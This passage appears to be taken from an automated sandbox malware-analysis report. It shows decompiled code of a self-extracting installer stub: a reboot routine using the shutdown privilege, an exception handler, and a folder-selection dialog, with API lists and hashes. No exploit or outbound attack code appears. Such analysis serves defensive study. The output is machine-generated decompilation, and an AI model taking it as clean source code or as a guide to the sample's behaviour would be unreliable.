                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 149e513c587ebe1ed93f2859b31c004f6034c020df6e488b8efa4097fe8eb067
                                                                                                                                                                                                        • Instruction ID: fa797a1c72f3d4a414f8ead1dabf8b9809e24c45bf7ffd0ed1273ce78c986b66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 149e513c587ebe1ed93f2859b31c004f6034c020df6e488b8efa4097fe8eb067
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D16B75A04A445FEB798B3C8C48FFE3BE1AB16306F1840ADC486D6191DA75AEC2CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E000C1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xc9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E000C44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E000C6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E000C44B9(0, 0x522, 0xc1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E000C1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x000c1f90
                                                                                                                                                                                                        0x000c1f90
                                                                                                                                                                                                        0x000c1f93
                                                                                                                                                                                                        0x000c1f98
                                                                                                                                                                                                        0x000c1fa4
                                                                                                                                                                                                        0x000c1fa7
                                                                                                                                                                                                        0x000c1fc5
                                                                                                                                                                                                        0x000c1fcd
                                                                                                                                                                                                        0x000c1fdb
                                                                                                                                                                                                        0x000c1ee5
                                                                                                                                                                                                        0x000c1eea
                                                                                                                                                                                                        0x000c1ef1
                                                                                                                                                                                                        0x000c1ef4
                                                                                                                                                                                                        0x000c1f0c
                                                                                                                                                                                                        0x000c1f2e
                                                                                                                                                                                                        0x000c1f3a
                                                                                                                                                                                                        0x000c1f46
                                                                                                                                                                                                        0x000c1f4d
                                                                                                                                                                                                        0x000c1f58
                                                                                                                                                                                                        0x000c1f60
                                                                                                                                                                                                        0x000c1f61
                                                                                                                                                                                                        0x000c1f62
                                                                                                                                                                                                        0x000c1f75
                                                                                                                                                                                                        0x000c1f80
                                                                                                                                                                                                        0x000c1f77
                                                                                                                                                                                                        0x000c1f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1f77
                                                                                                                                                                                                        0x000c1f64
                                                                                                                                                                                                        0x000c1f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1f64
                                                                                                                                                                                                        0x000c1f0e
                                                                                                                                                                                                        0x000c1f0e
                                                                                                                                                                                                        0x000c1f13
                                                                                                                                                                                                        0x000c1f13
                                                                                                                                                                                                        0x000c1f14
                                                                                                                                                                                                        0x000c1f14
                                                                                                                                                                                                        0x000c1f16
                                                                                                                                                                                                        0x000c1f17
                                                                                                                                                                                                        0x000c1f1a
                                                                                                                                                                                                        0x000c1f1f
                                                                                                                                                                                                        0x000c1f1f
                                                                                                                                                                                                        0x000c1f86
                                                                                                                                                                                                        0x000c1f8f
                                                                                                                                                                                                        0x000c1fcf
                                                                                                                                                                                                        0x000c1fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1fd3
                                                                                                                                                                                                        0x000c1fa9
                                                                                                                                                                                                        0x000c1fb4
                                                                                                                                                                                                        0x000c1fbb
                                                                                                                                                                                                        0x000c1fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1fc3
                                                                                                                                                                                                        0x000c1f9a
                                                                                                                                                                                                        0x000c1f9a
                                                                                                                                                                                                        0x000c1fa2
                                                                                                                                                                                                        0x000c1fd9
                                                                                                                                                                                                        0x000c1fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 000C1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000C1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 000C1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: cc35d44b5b21d4f4b46e893725280eebad5386312ef8332f63fc7314e13bf8bd
                                                                                                                                                                                                        • Instruction ID: 4312b155402821f429c679be266d689e3429af67d88de7dc5f0a2e3b9e201f3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc35d44b5b21d4f4b46e893725280eebad5386312ef8332f63fc7314e13bf8bd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D219A71B40205BBEB705BA19C4EFFF76B8EB87754F24002DFA06D6182D77988029661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x000c6cf7
                                                                                                                                                                                                        0x000c6d00
                                                                                                                                                                                                        0x000c6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000C6E26,000C1000), ref: 000C6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(000C6E26,?,000C6E26,000C1000), ref: 000C6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,000C6E26,000C1000), ref: 000C6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,000C6E26,000C1000), ref: 000C6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 7e3165b3f8b389cba78e2a254c40e22e78e983b138576e195f4098d573c494dd
                                                                                                                                                                                                        • Instruction ID: 1d64b292c325542c1fcda826ad69faf374dcb6fd37907283d2e18d7f0c2f1a91
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e3165b3f8b389cba78e2a254c40e22e78e983b138576e195f4098d573c494dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49D0C93220010CBFFB002BF1EC0CE593F28EB4A21AF4D4000FB19C2060CA3A44518B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E000C3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E000C43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xc9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xc91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E000C44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xc91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xc91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xc91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xc91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E000C658A(0xc91e4, 0x104, 0xc1140);
                                                                                                                                                                                                        								_t27 = E000C58C8(0xc91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xc91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xc91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E000C597D(0xc91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xc91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xc91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E000C44B9(_t64, 0x54a, 0xc91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xc91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xc91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xc91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xc91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xc9a3c, 0x3e8, 0xc8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E000C4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xc87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E000C44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x000c321b
                                                                                                                                                                                                        0x000c321e
                                                                                                                                                                                                        0x000c3221
                                                                                                                                                                                                        0x000c343c
                                                                                                                                                                                                        0x000c343e
                                                                                                                                                                                                        0x000c343f
                                                                                                                                                                                                        0x000c3445
                                                                                                                                                                                                        0x000c3447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3447
                                                                                                                                                                                                        0x000c3229
                                                                                                                                                                                                        0x000c322a
                                                                                                                                                                                                        0x000c322f
                                                                                                                                                                                                        0x000c33ec
                                                                                                                                                                                                        0x000c33f7
                                                                                                                                                                                                        0x000c3410
                                                                                                                                                                                                        0x000c3416
                                                                                                                                                                                                        0x000c341d
                                                                                                                                                                                                        0x000c342d
                                                                                                                                                                                                        0x000c342d
                                                                                                                                                                                                        0x000c3438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3438
                                                                                                                                                                                                        0x000c3237
                                                                                                                                                                                                        0x000c3243
                                                                                                                                                                                                        0x000c3243
                                                                                                                                                                                                        0x000c3246
                                                                                                                                                                                                        0x000c32ee
                                                                                                                                                                                                        0x000c32f4
                                                                                                                                                                                                        0x000c32f6
                                                                                                                                                                                                        0x000c33d4
                                                                                                                                                                                                        0x000c33d6
                                                                                                                                                                                                        0x000c33db
                                                                                                                                                                                                        0x000c33dc
                                                                                                                                                                                                        0x000c33de
                                                                                                                                                                                                        0x000c33df
                                                                                                                                                                                                        0x000c3370
                                                                                                                                                                                                        0x000c3372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3372
                                                                                                                                                                                                        0x000c32fc
                                                                                                                                                                                                        0x000c3301
                                                                                                                                                                                                        0x000c3301
                                                                                                                                                                                                        0x000c3303
                                                                                                                                                                                                        0x000c3304
                                                                                                                                                                                                        0x000c3304
                                                                                                                                                                                                        0x000c330a
                                                                                                                                                                                                        0x000c330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3313
                                                                                                                                                                                                        0x000c3318
                                                                                                                                                                                                        0x000c331a
                                                                                                                                                                                                        0x000c3331
                                                                                                                                                                                                        0x000c3332
                                                                                                                                                                                                        0x000c333a
                                                                                                                                                                                                        0x000c333d
                                                                                                                                                                                                        0x000c337c
                                                                                                                                                                                                        0x000c3388
                                                                                                                                                                                                        0x000c338f
                                                                                                                                                                                                        0x000c3394
                                                                                                                                                                                                        0x000c3396
                                                                                                                                                                                                        0x000c33a4
                                                                                                                                                                                                        0x000c33ab
                                                                                                                                                                                                        0x000c33b6
                                                                                                                                                                                                        0x000c33be
                                                                                                                                                                                                        0x000c33c3
                                                                                                                                                                                                        0x000c33c5
                                                                                                                                                                                                        0x000c3435
                                                                                                                                                                                                        0x000c3437
                                                                                                                                                                                                        0x000c3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3437
                                                                                                                                                                                                        0x000c33c7
                                                                                                                                                                                                        0x000c33c9
                                                                                                                                                                                                        0x000c33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c33cc
                                                                                                                                                                                                        0x000c33ad
                                                                                                                                                                                                        0x000c33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c33b4
                                                                                                                                                                                                        0x000c3398
                                                                                                                                                                                                        0x000c3399
                                                                                                                                                                                                        0x000c339b
                                                                                                                                                                                                        0x000c339c
                                                                                                                                                                                                        0x000c339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c339d
                                                                                                                                                                                                        0x000c334c
                                                                                                                                                                                                        0x000c3351
                                                                                                                                                                                                        0x000c3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c335c
                                                                                                                                                                                                        0x000c3362
                                                                                                                                                                                                        0x000c3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3366
                                                                                                                                                                                                        0x000c3367
                                                                                                                                                                                                        0x000c3369
                                                                                                                                                                                                        0x000c336a
                                                                                                                                                                                                        0x000c336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c336b
                                                                                                                                                                                                        0x000c331c
                                                                                                                                                                                                        0x000c3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3329
                                                                                                                                                                                                        0x000c332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c332b
                                                                                                                                                                                                        0x000c324c
                                                                                                                                                                                                        0x000c324c
                                                                                                                                                                                                        0x000c324f
                                                                                                                                                                                                        0x000c32c8
                                                                                                                                                                                                        0x000c32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32ce
                                                                                                                                                                                                        0x000c3251
                                                                                                                                                                                                        0x000c3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3271
                                                                                                                                                                                                        0x000c3277
                                                                                                                                                                                                        0x000c3279
                                                                                                                                                                                                        0x000c3298
                                                                                                                                                                                                        0x000c329d
                                                                                                                                                                                                        0x000c329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32b0
                                                                                                                                                                                                        0x000c32b6
                                                                                                                                                                                                        0x000c32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c32be
                                                                                                                                                                                                        0x000c3280
                                                                                                                                                                                                        0x000c3289
                                                                                                                                                                                                        0x000c328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c328e
                                                                                                                                                                                                        0x000c327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,000C8598,00000200), ref: 000C3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 000C3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 000C3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 000C342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-570518801
                                                                                                                                                                                                        • Opcode ID: 2ab98c7ea692512469060af4f171cc9c15181b91d3af6cb617e845c617a07c67
                                                                                                                                                                                                        • Instruction ID: 2a4d67e3d6b37e449b26f71d42d5c4ce4910da31c7bf2d6f9b50a47a3abc93da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab98c7ea692512469060af4f171cc9c15181b91d3af6cb617e845c617a07c67
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A5149703A02807BFBB55B355C4DFBF3998DB86B54F14C02CFA45961D1CAA8DF019261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
